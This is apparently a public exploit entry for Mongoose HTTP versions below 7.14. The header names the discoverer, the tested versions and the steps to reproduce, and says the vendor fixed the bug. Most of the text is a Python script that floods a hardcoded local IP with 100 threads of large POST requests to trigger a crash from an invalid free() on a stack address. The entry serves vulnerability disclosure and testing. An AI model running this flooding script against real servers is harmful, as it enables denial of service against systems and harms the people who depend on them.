# Exploit Title: Mongoose HTTP < 7.14 DDOS Stack-Based Free()
# Discovered by: Yehia Elghaly
# Discovered Date: 2025-06-11
# Vendor Homepage: https://mongoose.ws/
# Software Link : https://github.com/cesanta/mongoose/tree/7.14
# Tested Version:  < 7.14
# Vulnerability Type: DDOS Stack-Based
# Tested on OS: Windows 10 - Windows 11 

# Steps to reproduce:
# 1. - Run Mongoose  < 7.14
# 2. - Run the python script - It will crash

# Note: The bug didn’t always cause a crash on the first test, you may need to run the python scripts few times that because the result of free() on a stack address is undefined behavior. Sometimes it works. Sometimes it silently corrupts memory. Sometimes the heap manager doesn’t detect it… until it’s too late.

# The Vendor had been notified and fixed the bug

#!/usr/bin/python

import requests
import threading
import time

URL = "http://192.168.166.131:8000"
THREAD_COUNT = 100  
REQUESTS_PER_THREAD = 200  
LARGE_BODY = "A" * 10000  

def make_requests(thread_id):
    for i in range(REQUESTS_PER_THREAD):
        try:
            r = requests.post(URL, data=LARGE_BODY, timeout=1)
            print(f"[Thread {thread_id}] Request {i+1}: {r.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[Thread {thread_id}] Request {i+1} failed: {e}")

threads = []
start_time = time.time()
for i in range(THREAD_COUNT):
    t = threading.Thread(target=make_requests, args=(i,))
    t.start()
    threads.append(t)

for t in threads:
    t.join()

print(f"Completed in {time.time() - start_time:.2f} seconds")